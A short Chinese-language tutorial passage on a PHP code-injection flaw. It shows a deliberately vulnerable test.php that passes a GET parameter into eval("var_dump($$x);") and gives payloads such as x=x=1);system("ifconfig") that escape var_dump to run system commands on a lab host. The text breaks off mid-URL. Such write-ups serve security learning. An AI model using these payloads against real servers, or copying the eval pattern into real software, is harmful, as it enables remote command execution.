一个小的知识点。。。
这里主要是一个关于$$变量覆盖问题和eval("var_dump($x);");中绕过var_dump造成命令执行漏洞的分析
我将PHP代码写在test.php文件里了
root@kali:/var/www/html# vi test.php
代码内容:
<?php
$x = $_GET['x'];
eval("var_dump($$x);");
?>
可以发现这里$$x实际就是一个变量覆盖问题,而$x变量又是我们可控的,所以就可以var_dump一些我们想打印的东西,例如payload:
http://192.168.43.242/test.php?x=x=abc
但是现在我想用eval执行一些系统命令,因为有var_dump(),所以我们需要绕过这个函数,执行其他函数,比如:exec()、passthru()、system()、 shell_exec()这些函数能够执行系统命令
利用一:
payload: x=x=1);system("ifconfig"
http://192.168.43.242/test.php?x=x=1);system